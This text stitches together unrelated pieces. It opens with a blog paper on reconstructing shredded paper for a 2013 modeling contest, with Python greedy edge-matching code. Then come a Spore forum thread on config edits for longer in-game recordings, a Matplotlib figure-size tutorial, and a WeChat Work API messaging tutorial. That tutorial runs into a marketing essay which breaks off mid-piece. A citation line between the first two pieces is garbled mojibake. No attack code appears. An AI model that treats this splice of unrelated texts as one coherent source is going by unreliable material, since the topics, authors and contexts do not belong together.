Preface: a year ago, during the national contest, I chose Problem B, and after finishing it I even posted three articles under the title "Shredded-paper reconstruction: a one-person mathematical modeling project". At the time I was simply interested in the problem; after a day of study I had basically finished the code for Attachments 1 and 2, and only had a rough idea about Attachments 3 and 4. This year the teacher of our mathematical modeling course assigned this very problem as a major homework, so I picked the passion of a year ago back up and continued that unfinished one-person modeling project...
Unlike last year, this time all the code is implemented in Python: more concise, clearer, and perhaps even more efficient. Below is the full text of the paper.
Research background #
On October 29, 2011, the US Defense Advanced Research Projects Agency (DARPA) announced a Shredder Challenge, aimed at finding efficient and effective algorithms for reconstructing the scraps produced by a paper shredder.[1] The contest attracted around 9,000 teams across the United States, and after more than a month one team finally completed the official puzzles.
In recent years, shredded-paper reconstruction has received growing attention. It demonstrates the possibility of "recovering the truth" from fragments, showing that the original information can be "decrypted" from broken pieces. The technique is also related to "panorama stitching" in photo processing, which combines several photos taken from different viewpoints into one complete panorama. Studying shredded-paper reconstruction in depth is therefore of real significance.
Taking Problem B of the 2013 China Undergraduate Mathematical Contest in Modeling as the occasion, this paper makes a preliminary study of reconstructing idealized paper shreds and essentially completes the reconstruction of the shreds provided officially. Our work shows that reconstructing idealized shreds is entirely feasible, and that it can be done in a fairly short time.
Idealized assumptions #
We assume that the paper shreds satisfy the following idealized assumptions:
1. Every shred is a rectangle of the same size;
2. The paper was cut with parallel, non-slanted cuts;
3. Every shred lies face up;
4. No shreds are missing and no extraneous shreds are mixed in, i.e. all the shreds together can be assembled into one complete original image.
Building the model #
Under the idealized assumptions above we build a mathematical model of shredded-paper reconstruction. In it we use and improve a greedy algorithm, and we analyse the matching metric and the role of human intervention.
An idealized image fragment is a rectangle; after rasterization it is simply a pixel matrix. To decide whether two shreds are adjacent we mainly check whether their edges fit together, that is, we compare the similarity of the edge column vectors of the two pixel matrices. For the matching metric we compared two different indicators, distance and correlation coefficient, and finally settled on distance. Finally, for the assembly of Attachments 3 and 4 we added two modes of human intervention; the results show that both modes work well, although they leave room for further optimization.
It should be noted that, in order to keep the algorithm widely applicable, we did not binarize the images. For this particular problem binarizing the shred images would allow more effective processing, but binarization is not suitable for reconstructing most types of images (here "type" refers to the content of the shreds; the shreds must still satisfy the idealized assumptions). So, to give our algorithm a wider range of applicability, we process the original images directly instead of binarizing them first.
Greedy algorithm
For matching the shreds we mainly use a greedy algorithm. The main steps are: manually choose a starting shred; compare the rightmost edge vector of its pixel matrix with the leftmost edge vectors of the remaining shreds; pick the shred with the best matching score; then take the newly matched shred as the new starting point and again find the best match among the remaining shreds, and so on.
A greedy algorithm seeks a local optimum at each step in the hope of reaching a global optimum; it is easy to program and efficient. But precisely because it only looks for a local optimum at every step, we cannot guarantee that the final result is globally optimal. In shredded-paper reconstruction this can cause two anomalies:
1. Different starting shreds lead to different assembly results.
2. When there is little edge information, matching errors occur frequently.
To (partly) avoid these drawbacks of the greedy algorithm, we improved it by adding human intervention. Tests show that Attachments 1 and 2 need no extra intervention, so the human intervention is designed only for Attachments 3 and 4; the improvements are described in detail in $\ref{sec:rengongganyu}$.
Matching metric
Generally speaking, by the continuity of the image, the edge pixels of two adjacent shreds should be similar or even identical (this is what the figure in the original paper illustrates). It is then natural to take, as the matching metric for two edges, the distance between the two edge vectors:
$$\begin{equation}d^2=|\boldsymbol{x}-\boldsymbol{y}|^2=\sum_{i=1}^{n}(x_i-y_i)^2\end{equation}$$
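For concreteness, here is a minimal NumPy sketch of this squared-distance computation between the right edge of one shred and the left edge of another (illustrative only, not the code listed in the appendix; the file names are just examples):

import numpy as np
from PIL import Image

a = np.array(Image.open('008.bmp'), dtype=float)   # one shred
b = np.array(Image.open('014.bmp'), dtype=float)   # a candidate neighbour

right_edge = a[:, -1]                      # rightmost pixel column of shred a
left_edge = b[:, 0]                        # leftmost pixel column of shred b
d2 = np.sum((right_edge - left_edge)**2)   # the squared distance d^2 in the formula above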
If the distance between two edge vectors is 0, we can be confident that the two shreds match. But when the distance between the two vectors is large, how confident can we be that the two shreds do not match? We know that a typical image is not only continuous but also changes gradually: for an ordinary picture, two adjacent pixel columns can be regarded as varying roughly linearly. From this point of view it seems more appropriate to measure the match with "linear correlation". The linear correlation coefficient [3] is computed as:
$$\begin{equation}\rho_{X,Y}={\mathrm{cov}(X,Y) \over \sigma_X \sigma_Y} ={E[(X-\mu_X)(Y-\mu_Y)] \over \sigma_X\sigma_Y}\end{equation}$$
The correlation coefficient is considerably more expensive to compute than the distance. We ran assembly tests on the same groups of shreds with both metrics; over shreds with different kinds of content, the correlation coefficient performed better overall. However, its advantage shows up on shreds of photographs (shreds that our team generated ourselves in order to test the algorithm), while for the text-content shreds provided officially the two metrics give no noticeable difference. In the end, for simplicity, we chose the vector distance as our matching metric.
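As a rough sketch of the alternative metric (again illustrative only, reusing right_edge and left_edge from the sketch above), the correlation score could be computed with NumPy:

rho = np.corrcoef(right_edge, left_edge)[0, 1]   # Pearson correlation of the two edge vectors
# for rho, values closer to 1 mean a better match, whereas for d^2 smaller is better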
Human intervention
This section is designed for Attachments 3 and 4. To make manual intervention easier, when assembling the shreds we draw each shred's file name onto it as a watermark, without modifying the original shred files.
First, if the code for Attachments 1 and 2 is applied directly to Attachment 3, we get the following kind of (partial) result:
All the shreds get joined into one long strip; parts of the strip are joined correctly, but there are also quite a few mistakes. Looked at from another angle, the shreds have now been merged into a pile of roughly 20 to 30 somewhat larger blocks. In other words, we can lock in the joins that are already correct and then assemble these blocks. This turns 200-odd shreds into 20-odd blocks and greatly reduces the workload. A person has to identify in the picture which pieces are already joined correctly and record them in the code; in effect this is a process of manual clustering. (We did not use an algorithm to cluster automatically here; the reasons are explained later in the difficulty analysis.)
In addition, we introduce "manual exclusion". When two edge distances happen to be very close, the greedy algorithm may produce a wrong match. We must recognize, however, that this does not happen often: when there is enough edge information, or after the shreds have been clustered, a wrong match is a low-probability event. So whenever we notice a wrong match, we can manually exclude that particular pairing, so that the program chooses the best option among the remaining candidates. We have good reason to believe that after a finite (very small) number of exclusions the program will automatically match the correct shreds.
Once further correct joins are known, they can be added back into the code; we then keep excluding and joining by hand, and by repeating this process the reconstruction can be finished in an "acceptable" amount of time.
Solving the problem #
Here we collect the results we obtained.
Attachments 1 and 2
We explain only Attachment 1 as an example. The assembly code for Attachment 1 is given in the appendix. First, pick an arbitrary starting image, i.e. the value of $m$ in the code; from the result, work out which starting image is the correct one (008.bmp), then change $m$ accordingly and run the assembly once more. Tests show that no extra human intervention is needed. The final splicing order for Attachment 1 is
[8, 14, 12, 15, 3, 10, 2, 16, 1, 4, 5, 9, 13, 18, 11, 7, 17, 0, 6]
The reconstruction of Attachment 2 proceeds in essentially the same way as Attachment 1; its splicing order is:
[3, 6, 2, 7, 15, 18, 11, 0, 5, 1, 9, 13, 10, 8, 12, 14, 17, 16, 4]
Attachments 3 and 4
The code for Attachment 3 is adapted from the code for Attachment 1, mainly by adding three features: file-name watermarks, manual joining, and manual exclusion. Running the unmodified code directly gives the following (partial) splicing sequence:
[14, 128, 3, 159, 82, 199, 7, 208, 29, 64, 111, 201, 5, 92, 180, 48, 37, 75, 38, 148, ...
By inspection, the run [14, 128, 3, 159, 82, 199] is joined correctly, [7, 208] is joined correctly, [29, 64, 111, 201, 5, 92, 180, 48, 37, 75] is also joined correctly, and so on. So, one after another, we add the following right after the line "known=[[] for i in range(0,num)]" in the code:
known[14] = [128, 3, 159, 82, 199]
known[7] = [208]
known[29] = [64, 111, 201, 5, 92, 180, 48, 37, 75]
...
We can also see that matching 7 after 199 is wrong, matching 29 after 208 is wrong, and 38 cannot follow 75 either. So, after the line "impossible=[[] for i in range(0,num)]", we add:
impossible[199] = [7]
impossible[208] = [29]
impossible[75] = [38]
...
After these modifications, rerun the script to obtain a new splicing sequence. Add the newly appearing correct runs, together with any correct joins that are easy to spot by hand, into known, and add the clearly wrong joins into impossible. Repeat this procedure. In about two hours, every row of Attachment 3 can be assembled. In other words, we first assemble each row, render each row as an image, and then splice the rows together vertically.
The same method completes the assembly of Attachment 4.
Difficulty analysis #
Reconstructing Attachments 3 and 4 took us a little over two hours each. Simple automatic clustering could shorten this, but a rough estimate suggests only a constant-factor improvement. This shows that automatic shredded-paper reconstruction is a rather hard problem. Based on our team's experience, we analyse below where the difficulty lies.
Clustering is hard to make effective
Although clustering can remove part of the workload, in practice the benefit it brings is very small. In our code, even when we manually picked out the 19 shreds belonging to the same row and then let the algorithm assemble them automatically, the result was still unsatisfactory; this comes from the bias caused by having too little edge information and is hard to avoid.
Second, clustering is too limited. The shreds in the contest come from cutting up an article, and an article has fairly obvious regularities (uniform font size, uniform line spacing, and so on), which is the only reason preliminary clustering is possible at all. For general shreds, such as shreds of a photograph, there is no comparable way to cluster. Clustering is therefore hard to make effective, and in this problem it can only give a constant-factor speed-up.
Vertical information is hard to exploit
After our team finished assembling each row of Attachment 3, we obtained 11 horizontal strips. But even taking these 11 strips as the starting point, automatic splicing still made many mistakes and could not finish on its own. In other words, even once every row has been assembled, the vertical edges still provide rather little information; trying to use vertical information at the very beginning, when there were 200-odd small shreds, would be nearly impossible. So it is almost fair to say that during assembly only the horizontal information is usable, which makes the problem considerably harder.
Lessons from the champions
Shredded-paper reconstruction is itself a rather difficult problem: in the DARPA Shredder Challenge mentioned at the beginning of this paper, even the winning team needed more than a month to complete the task.[4] The two problems are not really comparable in difficulty, but this is an indirect indication of how hard shredded-paper reconstruction is. The two-plus hours this paper spends on each of Attachments 3 and 4 should therefore fall within an acceptable amount of time.
Directions for improvement #
We propose one direction in which the algorithm could be improved; due to time constraints we could not verify it in detail, so we only sketch it briefly.
The human eye finds it fairly easy to judge whether two shreds are adjacent, yet turning that judgement into a computer algorithm is much harder. We notice that when we look at the edge of a shred we do not see just a single column of edge pixels (our eyes are not that finely resolved); rather, we see the averaged effect of several columns of pixels near the edge. So one improvement is that the matching score should not be computed from a single edge column only, but should take several columns near the edge into account, as the sketch below illustrates.
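One possible way to realize this multi-column idea (our own hypothetical sketch, not something the paper implemented or verified; it reuses the arrays a and b from the earlier distance sketch) is to average a few columns near each edge before computing the squared distance:

k = 3                                     # number of edge columns to average (illustrative choice)
right_block = a[:, -k:].mean(axis=1)      # averaged profile of the last k columns of shred a
left_block = b[:, :k].mean(axis=1)        # averaged profile of the first k columns of shred b
d2_multi = np.sum((right_block - left_block)**2)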
Following this idea of how the eye works, we could use the "continuity" of the image as the matching metric. However, image continuity does not yet have a precise definition, and how to judge from several columns of pixels whether an image is continuous still needs deeper analysis. We offer this only as a starting point, and welcome readers' suggestions.
References #
[1] Guokr: http://www.guokr.com/article/78259/
[2] Discrete Mathematical Structures, Bernard Kolman et al.; Chinese translation by Luo Ping
[3] Pearson product-moment correlation coefficient: http://zh.wikipedia.org/zh/皮尔逊积矩相关系数
[4] Solidot: http://www.solidot.org/story?sid=27531
Code listing #
The code below runs under Python 3.4 (Win32); the corresponding NumPy and Pillow libraries need to be installed.
Code for Attachments 1 and 2
import os
import numpy
from PIL import Image

# list all files in the current directory
images = os.listdir(os.getcwd())
images.remove('c.py')                     # name of this script itself
num = len(images)                         # number of images
hang = Image.open(images[0]).size[1]      # image height
lie = Image.open(images[0]).size[0]       # image width
bianyuan = numpy.zeros((hang, 2*num))     # matrix storing the edge columns

# open each image and extract its edge values
for i in range(0, num):
    img = Image.open(images[i])
    bianyuan[:, 2*i+1] = numpy.array(img)[:, 0]      # !!! left edge goes into the odd columns
    bianyuan[:, 2*i] = numpy.array(img)[:, lie-1]    # !!! right edge goes into the even columns
# edge extraction finished

i = 0; m = 31                             # m is the starting shred (index)
xulie = [m]                               # stores the splicing order
temp = [k for k in range(0, num)]
while i < num-1:
    m1 = temp[m]
    temp.remove(temp[m])
    bijiao = numpy.zeros(len(temp))       # array used for the comparison
    for j in range(0, len(temp)):
        bijiao[j] = numpy.sum((bianyuan[:, 2*m1] - bianyuan[:, 2*temp[j]+1])**2)  # compare this right edge with every remaining left edge
    m = numpy.argmin(bijiao)              # smallest difference means the best fit
    xulie.append(temp[m])
    i = i+1
print(xulie)                              # comparison finished, output the order

comb_img = Image.new("RGBA", (lie*num, hang), (255, 0, 0))   # new image used to compose the result
j = 0
for i in xulie:
    img = Image.open(images[i])
    region = img.crop((0, 0, lie, hang))
    comb_img.paste(region, (lie*j, 0, lie*(j+1), hang))
    j = j+1
comb_img.show()
Code for Attachments 3 and 4
import os
import numpy
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont

# list all files in the current directory
images = os.listdir(os.getcwd())
images.remove('c.py')
num = len(images)                         # number of images
hang = Image.open(images[0]).size[1]      # image height
lie = Image.open(images[0]).size[0]       # image width
bianyuan = numpy.zeros((hang, 2*num))     # matrix storing the edge columns

# open each image and extract its edge values
for i in range(0, num):
    img = Image.open(images[i])
    bianyuan[:, 2*i+1] = numpy.array(img)[:, 0]      # !!! left edge goes into the odd columns
    bianyuan[:, 2*i] = numpy.array(img)[:, lie-1]    # !!! right edge goes into the even columns
# edge extraction finished

known = [[] for i in range(0, num)]       # joins already known to be correct
impossible = [[] for i in range(0, num)]  # joins that have been ruled out
i = 0; m = 14                             # m is the starting shred (index)
m1 = m
xulie = [m]                               # stores the splicing order
temp = [k for k in range(0, num)]
temp.remove(m1)
for kn in known:
    for knn in kn:
        try:
            temp.remove(knn)              # drop shreds whose position is already known
        except: pass
while i < num-1:
    if len(known[m1]) != 0:
        m2 = 0
        for kn in known[m1]:
            xulie.append(kn)
            m2 = kn
            i = i+1
        m1 = m2
    else:
        temp1 = temp[:]
        for imp in impossible[m1]:
            try:
                temp.remove(imp)
            except: pass
        bijiao = numpy.zeros(len(temp))   # array used for the comparison
        for j in range(0, len(temp)):
            bijiao[j] = numpy.sum((bianyuan[:, 2*m1] - bianyuan[:, 2*temp[j]+1])**2)  # compare this right edge with every remaining left edge
        m = numpy.argmin(bijiao)          # smallest difference means the best fit
        xulie.append(temp[m])
        i = i+1
        m1 = temp[m]
        temp = temp1[:]
        temp.remove(m1)                   # "burn the bridge": the shred just used is no longer a candidate
print(xulie)                              # comparison finished, output the order

# add a watermark with the file index to each shred
myfont = ImageFont.truetype("C:\Windows\Fonts\simsun.ttc", 36)   # watermark font and size
comb_img = Image.new("RGBA", (lie*num, hang), (255, 0, 0))       # new image used to compose the result
j = 0
for i in xulie:
    img = Image.open(images[i])
    d = ImageDraw.Draw(img)               # draw the watermark
    d.ink = 150                           # watermark colour
    d.text((0, 0), str(i), font=myfont)   # write the shred index as the watermark
    region = img.crop((0, 0, lie, hang))
    comb_img.paste(region, (lie*j, 0, lie*(j+1), hang))
    j = j+1
comb_img.show()
Final modifications (Attachment 3)
known=[[] for i in range(0,num)] #joins already known to be correct
known[14]=[128, 3, 159, 82, 199, 135, 12, 73, 160, 203, 169, 134, 39, 31, 51, 107, 115, 176, 94]
known[94]=[34, 84, 183, 90, 47, 121, 42, 124, 144, 77, 112, 149, 97, 136, 164, 127, 58, 43, 7]
known[7]=[208, 138, 158, 126, 68, 175, 45, 174, 0, 137, 53, 56, 93, 153, 70, 166, 32, 196, 38]
known[38]=[148, 46, 161, 24, 35, 81, 189, 122, 103, 130, 193, 88, 167, 25, 8, 9, 105, 74, 168]
known[168]=[100, 76, 62, 142, 30, 41, 23, 147, 191, 50, 179, 120, 86, 195, 26, 1, 87, 18, 29]
known[29]=[64, 111, 201, 5, 92, 180, 48, 37, 75, 55, 44, 206, 10, 104, 98, 172, 171, 59, 61]
known[61]=[19, 78, 67, 69, 99, 162, 96, 131, 79, 63, 116, 163, 72, 6, 177, 20, 52, 36, 49]
known[49]=[54, 65, 143, 186, 2, 57, 192, 178, 118, 190, 95, 11, 22, 129, 28, 91, 188, 141, 125]
known[125]=[13, 182, 109, 197, 16, 184, 110, 187, 66, 106, 150, 21, 173, 157, 181, 204, 139, 145, 89]
known[89]=[146, 102, 154, 114, 40, 151, 207, 155, 140, 185, 108, 117, 4, 101, 113, 194, 119, 123]
known[71]=[156, 83, 132, 200, 17, 80, 33, 202, 198, 15, 133, 170, 205, 85, 152, 165, 27, 60]
impossible=[[] for i in range(0,num)] #joins that have been ruled out
impossible[199]=[7,29,38,49,61,62,67,71,80,89,94,125]
impossible[1]=[146,129,102,134]
impossible[79]=[71,146,89,94]
impossible[123]=[94,125]
impossible[176]=[7]
impossible[13]=[135,94]
impossible[160]=[143,168,146,25,94,7,29,38,49]
impossible[95]=[168,129]
impossible[124]=[136,8,46,138,129]
impossible[58]=[161,46,182,83]
impossible[46]=[9]
impossible[97]=[144]
impossible[25]=[168]
Final modifications (Attachment 4)
known=[[] for i in range(0,num)] #joins already known to be correct
known[20]=[41, 108, 116, 136, 73, 36, 207, 135, 15, 76, 43, 199, 45, 173, 79, 161, 179, 143, 86]
known[86]=[51, 107, 29, 40, 158, 186, 98, 24, 117, 150, 5, 59, 58, 92, 30, 37, 46, 127, 201]
known[201]=[148, 170, 196, 198, 94, 113, 164, 78, 103, 91, 80, 101, 26, 100, 6, 17, 28, 146,208]
known[208]=[21, 7, 49, 61, 119, 33, 142, 168, 62, 169, 54, 192, 133, 118, 189, 162, 197, 112,171]
known[171]=[42, 66, 205, 10, 157, 74, 145, 83, 134, 55, 18, 56, 35, 16, 9, 183, 152, 44, 132]
known[132]=[181, 95, 69, 167, 163, 166, 188, 111, 144, 206, 3, 130, 34, 13, 110, 25, 27, 178,70]
known[70]=[84, 60, 14, 68, 174, 137, 195, 8, 47, 172, 156, 96, 23, 99, 122, 90, 185,109,81]
known[81]=[77, 128, 200, 131, 52, 125, 140, 193, 87, 89, 48, 72, 12, 177, 124,0,102,115]
known[19]=[194, 93, 141, 88, 121, 126, 105, 155, 114, 176, 182, 151, 22, 57, 202, 71, 165,82]
known[191]=[75, 11, 154, 190, 184, 2, 104, 180, 64, 106, 4,149,32,204,65,39,67,147]
known[159]=[139,1,129, 63, 138, 153, 53, 38, 123, 120, 175, 85, 50, 160, 187, 97, 203, 31]
impossible=[[] for i in range(0,num)] #joins that have been ruled out
impossible[16]=[30,178,195,150,186,2,19,70,81,132]
impossible[122]=[109,197,32]
impossible[137]=[32]
impossible[204]=[4,54]
impossible[22]=[82]
impossible[12]=[120,149,159]
impossible[175]=[24,1]
impossible[158]=[30,195]
impossible[190]=[54,4]
impossible[144]=[197,32,178,195]
impossible[121]=[167,169]
impossible[150]=[130]
impossible[176]=[88]
impossible[141]=[182,70,81]
impossible[124]=[3]
impossible[138]=[102,0]
impossible[65]=[169,184,2]
impossible[165]=[9]
impossible[119]=[32,195,70]
impossible[27]=[177,195]
impossible[169]=[4]
impossible[62]=[126]
impossible[193]=[85,177]
impossible[162]=[70]
impossible[31]=[149]
impossible[184]=[202]
impossible[85]=[102]
impossible[57]=[88]
妿æ¨éè¦å¼ç¨æ¬æï¼è¯·åèï¼
èåæ. (Dec. 18, 2014). ãè¿å°ä¸å¹´ç建模ï¼åæ¢ç¢çº¸å¤å ã[Blog post]. Retrieved from https://kexue.fm/archives/3134
|
There is no download needed for this mod.
To do this, you need to make 2 simple edits to 2 different .txt files in your Spore GA Data folder (untested on core Spore)...
Open the ..Electronic Arts\SPORE_EP1\Data\Config folder...
Open ConfigManager.txt
Add floatprop recordMovieLength 5 on a new line at the bottom of the file and save it.
Open Properties.txt
Add property recordMovieLength 0x0456f974 float 5 on a new line at the bottom of the file and save it.
Launch Spore, enjoy!
Tested for 5 seconds and it worked!
So would the 5 be able to be replaced with 999999999999 to get a semi infinite record time?
Spore is creative, even the mods and hacks.
Or, should I say, especially the mods and hacks?
Now currently making content for the Life is Strange and Portal communities. Check me out on YouTube
Thanks Davo! This is going to help with the recording of my anthems.
no problem, try these out as well...
property recordMovieLength 0x0456f974 float 120 #default 2min
property recordMovieWidth 0x0456f975 int 320 #set type as int so it can be updated via options.txt when settings changes
property recordMovieHeight 0x0456f976 int 240
property recordMovieFPS 0x0456f977 float 15.0
property recordMovieQuality 0x0456f978 float 0.8
property recordMovieAudio 0x0456f979 bool true
property recordMovieNoUI 0x0456f97a bool true # don't capture UI
property recordMovieFrameUI 0x0641021a bool true # show REC frame when recording, can be disabled only when gameUI is enabled
i used these...
property recordMovieLength 0x0456f974 float 9999 #default 2min
property recordMovieWidth 0x0456f975 int 1920 #set type as int so it can be updated via options.txt when settings changes
property recordMovieHeight 0x0456f976 int 1080
property recordMovieFPS 0x0456f977 float 100.0
property recordMovieQuality 0x0456f978 float 1
property recordMovieAudio 0x0456f979 bool true
property recordMovieNoUI 0x0456f97a bool false # don't capture UI
property recordMovieFrameUI 0x0641021a bool true # show REC frame when recording, can be disabled only when gameUI is enabled
and these
floatprop recordMovieLength 9999
IntProp recordMovieWidth 1920
IntProp recordMovieHeight 1080
floatprop recordMovieFPS 100.0
floatprop recordMovieQuality 1
boolprop recordMovieAudio true
boolprop recordMovieNoUI false
boolprop recordMovieFrameUI true
the actual recording was choppy, maybe due to the 100 FPS
heres the video...
http://www.youtube.com/watch?v=jybn0tall1g
and of course, all of these properties are found in appproperties.trigger
Well, I'll say that this is a very nice find!
Doesn't work for me. Help me, how do I fix the crash?
GIRGHGH wrote: ??
You did not answer it.
Who were you speaking to, and how would we know what you meant?
Nice, this'll do fine for my spore videos (Coming up on https://www.youtube.com/channel/UCK7-mA ... ZKXhPoInxA if you are interested.)
When the fish are plenty, our tribes don't enter war. However, when the fish are scarce, all out war ensues. Luckily for us, my tribe knows how to farm fish.
|
Change the Figure Size in Matplotlib
Matplotlib is one of the most widely used data visualization libraries in Python. Much of Matplotlib's popularity comes from its customization options: you can tweak practically any element in its hierarchy of objects.
In this tutorial we'll take a look at how to change the size of a figure in Matplotlib.
Creating a Plot
First, let's create a simple plot on a figure:
import matplotlib.pyplot as plt
import numpy as np
x = np.arange(0, 10, 0.1)
y = np.sin(x)
plt.plot(x, y)
plt.show()
Here we plotted a sine function from 0 to 10, with a step of 0.1. Running this code produces the plot of the sine curve.
The Figure object, if not created explicitly, is created by default and contains all the elements we can and cannot see. Changing the size of the Figure will, in turn, change the size of the observable elements.
Let's take a look at how we can change the figure size.
Change the Figure Size in Matplotlib
Set the figsize Argument
First, the easiest way to change the size of a figure is to use the figsize argument. You can use this argument either during Pyplot initialization or on an existing Figure object.
Let's first change it during initialization:
import matplotlib.pyplot as plt
import numpy as np
x = np.arange(0, 10, 0.1)
y = np.sin(x)
plt.figure(figsize=(3, 3))
plt.plot(x, y)
plt.show()
Here we accessed the Figure instance that was created by default and passed it the figsize argument. Note that the size is defined in inches, not pixels. The result is a figure that is 3 by 3 inches.
It's important to set the figure size before plotting the variables.
Matplotlib/PyPlot don't currently support metric sizes, but it's easy to write a helper function to convert between the two:
def cm_to_inch(value):
    return value/2.54
And then adjust the size of the plot like this:
plt.figure(figsize=(cm_to_inch(15),cm_to_inch(10)))
This creates a plot that is 15 cm by 10 cm.
Alternatively, if you are creating a Figure object for your plot, you can assign the size right away:
import matplotlib.pyplot as plt
import numpy as np
x = np.arange(0, 10, 0.1)
y = np.sin(x)
z = np.cos(x)
fig = plt.figure(figsize=(8, 6))
# Adds subplot on position 1
ax = fig.add_subplot(121)
# Adds subplot on position 2
ax2 = fig.add_subplot(122)
ax.plot(x, y)
ax2.plot(x, z)
plt.show()
Here we explicitly assigned the return value of the figure() function to an object. We can then add axes to this figure to create several subplots and plot on them.
We used the add_subplot() function, which accepts a series of numeric values. The first number specifies how many rows you want to add to the figure, the second how many columns, and the third the position of the subplot you want to add.
This means that if you pass 111 to add_subplot(), one new subplot is added to the figure. If instead you used 221, the resulting figure would have four axes arranged in two rows and two columns, and the subplot you are creating would sit in position 1 (see the small sketch below).
This code produces a figure with the two subplots side by side.
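To make the numbering concrete, here is a small illustrative sketch (reusing x, y and z from the code above) that builds a 2-by-2 grid:

fig = plt.figure(figsize=(8, 6))
ax1 = fig.add_subplot(221)   # 2 rows, 2 columns, subplot in position 1 (top-left)
ax1.plot(x, y)
ax4 = fig.add_subplot(224)   # position 4 (bottom-right)
ax4.plot(x, z)
plt.show()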
Set the Height and Width of a Figure in Matplotlib
Instead of the figsize argument, we can also set the height and width of a figure. This can be done either with the set() function, passing figheight and figwidth, or with the set_figheight() and set_figwidth() functions.
The former lets you set several arguments in one line, while the latter gives more readable code.
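For reference, a minimal sketch of the first (one-line) option:

fig = plt.figure()
fig.set(figheight=5, figwidth=10)   # same effect as calling set_figheight(5) and set_figwidth(10)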
Let's go with the second option:
import matplotlib.pyplot as plt
import numpy as np
x = np.arange(0, 10, 0.1)
y = np.sin(x)
z = np.cos(x)
fig = plt.figure()
fig.set_figheight(5)
fig.set_figwidth(10)
# Adds subplot on position 1
ax = fig.add_subplot(121)
# Adds subplot on position 2
ax2 = fig.add_subplot(122)
ax.plot(x, y)
ax2.plot(x, z)
plt.show()
This code produces a 10-by-5-inch figure with the two subplots.
Finally, you can also use the set_size_inches() function:
fig = plt.figure()
fig.set_size_inches(10, 5)
# Adds subplot on position 1
ax = fig.add_subplot(121)
# Adds subplot on position 2
ax2 = fig.add_subplot(122)
ax.plot(x, y)
ax2.plot(x, z)
plt.show()
And it works just the same as setting the figsize argument or using the two setter functions.
|
Developer: Tencent
Software name: WeChat Work (企业微信)
Software type: office/collaboration platform
Last updated: January 15, 2020
First released: April 18, 2016
Software version: V3.0.2
Platforms: iOS, Android, Windows, Mac
Language: Simplified Chinese
Size: 107.56 MB [2]
2019-07-07 21:59:31  A tutorial on sending files and messages to WeChat Work (企业微信)
It's been a while since I updated this blog, so today I'm taking some time for something light. I imagine that at work most of you, like me, use WeChat Work to some extent. If you don't, no problem, just treat this as a new skill to pick up. Straight to the point, then: a tutorial on sending files and messages to WeChat Work.
Step 1: If you have never used WeChat Work before, simply download it and register; it only takes a few minutes. If you have used it, that's fine too, you can register a separate one for yourself and be your own boss, haha. Download link
Step 2: After registering, log in to the WeChat Work admin website and create an application; the registration page is shown in the original post's screenshot:
import json
import requests

# Note: the original post only showed the configuration constants and the three
# method bodies; the class wrapper, method names (other than get_access_token)
# and imports below were added so that the snippet is runnable.
class WeComSender:
    CORPID = 'XXX'       # enterprise ID
    CORPSECRET = 'XXX'   # application secret
    AGENTID = 'XXX'      # application (agent) ID
    TOUSER = 'XXX'       # member ID of the recipient

    def get_access_token(self):
        '''Fetch an access_token'''
        url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'
        values = {
            'corpid': self.CORPID,
            'corpsecret': self.CORPSECRET,
        }
        req = requests.post(url, params=values)
        data = json.loads(req.text)
        return data["access_token"]

    def get_media_id(self, path):
        '''Upload a file and get its media_id'''
        url = 'https://qyapi.weixin.qq.com/cgi-bin/media/upload?access_token={0}&type=file'.format(
            self.get_access_token())
        files = {'file': open(path, 'rb')}
        req = requests.post(url, files=files)
        data = json.loads(req.text)
        return data["media_id"]

    def send_message(self, message):
        '''Send a text message'''
        send_url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + self.get_access_token()
        send_data = '{"msgtype": "text", "safe": "0", "agentid": %s, "touser": "%s", "text": {"content": "%s"}}' % (
            self.AGENTID, self.TOUSER, message)
        try:
            r = requests.post(send_url, send_data)
            if json.loads(r.content)['errmsg'] == 'ok':
                print('Message sent successfully')
                return True
            raise Exception
        except Exception:
            return False
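A short usage sketch (the class name and method names, apart from get_access_token, were introduced above for readability and are not from the original post):

sender = WeComSender()
print(sender.get_access_token())          # prints a token string if the credentials are valid
sender.send_message('hello from Python')  # sends a text message to TOUSER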
If the code above feels like a hassle, you can click "get the source code" (in the original post), where all of the code has already been organized for you.
2020-01-19 12:05:08  WeChat Work marketing: how to market on WeChat Work, how to look after contacts, and how to get it set up; this one article covers it all.
How to market with WeChat Work, how to maintain contacts on it, how to get it set up: for all of these questions, this one article is enough.
A few days ago, WeChat Work opened up access to WeChat Moments and 100-person WeChat groups. Reading the various news reports, I found that many people do not understand what this means, or do not know how to use WeChat Work to drive traffic, hence this article.
We started experimenting with WeChat Work for traffic half a year ago. The reason is simple: basically everyone in China who can get online uses WeChat. For any merchant, on top of such a digital base, you have to consider the possibility of using WeChat for traffic.
In fact, many merchants have already gained large numbers of users and a lot of revenue through "private traffic" tactics on personal WeChat. The real value of personal-WeChat private traffic is already huge; plenty of merchants have no trouble making hundreds of millions of yuan a year through WeChat. But because personal WeChat has no official marketing tools, everyone relies on rather sketchy third-party tools. Those tools may seriously violate WeChat's policies, so the risk of being banned is high: on this year's 618 shopping day alone, reportedly thirty million WeChat accounts were banned, and since then the platform has kept a close eye on incentivized sharing and external links.
Tencent has never had a "To B" gene, which is perhaps forgivable; like many "To C" companies, they subconsciously feel that advertising is evil and ruins the user experience. My own view is that only delivering the wrong information to the wrong people is evil. If users need your information, even commercial information, they still need it. Many people may not realize that a lot of Baidu searchers are searching precisely to find a merchant; they will not even browse the non-ad links. For example, users who need a travel visa or want to register a company... they all hope to directly find a merchant who can serve them.
Fortunately, Tencent has finally figured this out: delivering high-quality information is what matters, and advertising is not inherently evil.
This opening of Moments and WeChat groups to WeChat Work is seen as the platform starting to officially support private traffic. Objectively that may well be true; after all, channeling beats blocking, and it is no accident that what got opened up is precisely Moments and group chats: private traffic depends on those two things.
The Moments and group-chat policies people care about most are currently as follows: (1) Content posted from WeChat Work Moments can appear in a customer's personal WeChat Moments, but enabling this permission currently requires review, and the mechanism is not fully transparent. (2) WeChat Work customer groups have had their member limit raised from the previous 20 to 100, which also requires review.
Both features are still tightly controlled, but judging from Tencent's past behaviour it is easy to predict that they will gradually open up. Either way, when the news came out, some people cheered, some thought it was of little use, but most people have no real concept of WeChat Work at all.
Before introducing how to drive traffic with WeChat Work, I want to share a few personal thoughts on private traffic, which are closely related to the direction of this WeChat Work update.
1. The past and present of private traffic
